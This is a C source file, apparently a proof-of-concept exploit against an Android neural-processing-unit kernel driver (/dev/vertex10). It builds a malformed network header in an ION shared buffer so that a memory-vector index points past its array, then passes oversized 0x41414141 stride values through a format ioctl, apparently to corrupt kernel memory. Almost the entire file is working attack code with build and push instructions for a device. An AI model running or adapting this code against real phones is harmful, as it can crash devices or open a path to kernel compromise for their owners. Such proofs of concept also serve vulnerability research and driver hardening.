/* aarch64-linux-gnu-gcc -o npu02 npu02.c -static
   adb push npu02 /data/local/tmp
 */

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

typedef uint32_t __u32;
typedef uint32_t u32;
typedef int32_t __s32;
typedef uint64_t __u64;

struct ion_allocation_data {
        __u64 len;
        __u32 heap_id_mask;
        __u32 flags;
        __u32 fd;
        __u32 unused;
};

#define ION_IOC_MAGIC           'I'

#define ION_IOC_ALLOC           _IOWR(ION_IOC_MAGIC, 0, struct ion_allocation_data)

#define ION_FLAG_CACHED 1

struct vs4l_graph {
        __u32                   id;
        __u32                   priority;
        __u32                   time; /* in millisecond */
        __u32                   flags;
        __u32                   size;
        unsigned long           addr;
};

#define VS4L_VERTEXIOC_S_GRAPH                  _IOW('V', 0, struct vs4l_graph)

enum vs4l_direction {
        VS4L_DIRECTION_IN = 1,
        VS4L_DIRECTION_OT
};

#define VS4L_DF_IMAGE(a, b, c, d)                       ((a) | (b << 8) | (c << 16) | (d << 24))
#define VS4L_DF_IMAGE_RGB                       VS4L_DF_IMAGE('R', 'G', 'B', '2')

struct vs4l_format {
        __u32                   target;
        __u32                   format;
        __u32                   plane;
        __u32                   width;
        __u32                   height;
        __u32                   stride;
        __u32                   cstride;
        __u32                   channels;
        __u32                   pixel_format;
};

struct vs4l_format_list {
        __u32                   direction;
        __u32                   count;
        struct vs4l_format      *formats;
};

#define VS4L_VERTEXIOC_S_FORMAT                  _IOW('V', 1, struct vs4l_format_list)

struct drv_usr_share {
        unsigned int id;
        int ncp_fd;
        unsigned int ncp_size;
        unsigned long ncp_mmap;
};

struct ncp_header {
        u32     magic_number1;
        u32     hdr_version;
        u32     hdr_size;
        u32     intrinsic_version;
        u32     net_id;
        u32     unique_id;
        u32     priority;
        u32     flags;
        u32     period;
        u32     workload;
        u32     address_vector_offset;
        u32     address_vector_cnt;
        u32     memory_vector_offset;
        u32     memory_vector_cnt;
        u32     chunk_vector_offset;
        u32     chunk_vector_cnt;
        u32     group_vector_offset;
        u32     group_vector_cnt;
        u32     body_version;
        u32     body_offset;
        u32     body_size;
        u32     blob_vector_offset;
        u32     blob_vector_cnt;
        u32     reserved[10];
        u32     magic_number2;
};

enum ncp_memory_type {
        MEMORY_TYPE_IN_FMAP, /* input feature map */
        MEMORY_TYPE_OT_FMAP, /* output feature map */
        MEMORY_TYPE_IM_FMAP, /* intermediate feature map */
        MEMORY_TYPE_OT_PIX0,
        MEMORY_TYPE_OT_PIX1,
        MEMORY_TYPE_OT_PIX2,
        MEMORY_TYPE_OT_PIX3,
        MEMORY_TYPE_WEIGHT,
        MEMORY_TYPE_WMASK,
        MEMORY_TYPE_LUT,
        MEMORY_TYPE_NCP,
        MEMORY_TYPE_GOLDEN,
        MEMORY_TYPE_CUCODE,
        MEMORY_TYPE_MAX
};

struct memory_vector {
        u32     type;
        u32     pixel_format;
        u32     width;
        u32     height;
        u32     stride;
        u32     channels;
        u32     cstride;
        u32     address_vector_index;
};

struct address_vector {
        u32     index;
        u32     m_addr;
        u32     s_addr;
        u32     size;
};

int main(void) {
	int ion_fd, fd, ret, i, found_system;
	struct ion_allocation_data ion_alloc;
	void *ion_buf;
	struct vs4l_graph vgr;
	struct drv_usr_share usr_data;
	struct ncp_header *ncp;
	struct memory_vector *mv;
	struct vs4l_format_list vfl;
	struct vs4l_format vf;

	ion_fd = open("/dev/ion", O_RDONLY|O_CLOEXEC);

	if (ion_fd == -1) {
		perror("ion open");
		return-1;
	}

	memset(&ion_alloc, 0, sizeof(struct ion_allocation_data));

	ion_alloc.len = 4096;
	ion_alloc.heap_id_mask = 1;

	ret = ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc);

	if (ret == -1) {
		perror("ioctl ION_IOC_ALLOC");
		return -1;
	}

	ion_buf = mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_SHARED, ion_alloc.fd, 0);

	if (ion_buf == MAP_FAILED) {
		perror("ion mmap");
		return -1;
	}

	fd = open("/dev/vertex10", O_RDWR);

	if (fd == -1) {
		perror("open");
		return -1;
	}

	memset(&vgr, 0, sizeof(struct vs4l_graph));
	memset(&usr_data, 0, sizeof(struct drv_usr_share));

	usr_data.ncp_fd = ion_alloc.fd;
	usr_data.ncp_size = 4096;

	vgr.addr = (unsigned long) &usr_data;

	ncp = (struct ncp_header *) ion_buf;
	ncp->memory_vector_cnt = 1;
	ncp->memory_vector_offset = 4096 - sizeof(struct memory_vector);
	ncp->address_vector_cnt = 4096 / sizeof(struct address_vector);

	mv = (struct memory_vector *) ((char *) ion_buf + 4096 - sizeof(struct memory_vector));

	mv->type = MEMORY_TYPE_IN_FMAP;
	mv->address_vector_index = ncp->address_vector_cnt - 1;

	ret = ioctl(fd, VS4L_VERTEXIOC_S_GRAPH, &vgr);

	if (ret == -1) {
		perror("ioctl VS4L_VERTEXIOC_S_GRAPH");
		return -1;
	}

	memset(&vfl, 0, sizeof(struct vs4l_format_list));
	memset(&vf, 0, sizeof(struct vs4l_format));

	vf.format = VS4L_DF_IMAGE_RGB;
	vf.stride = 0x41414141;
	vf.cstride = 0x41414141;

	vfl.count = 1;
	vfl.direction = VS4L_DIRECTION_IN;
	vfl.formats = &vf;

	ret = ioctl(fd, VS4L_VERTEXIOC_S_FORMAT, &vfl);

	if (ret == -1) {
		perror("ioctl VS4L_VERTEXIOC_S_FORMAT");
		return -1;
	}

	close(fd);
	close(ion_fd);

	return 0;
}
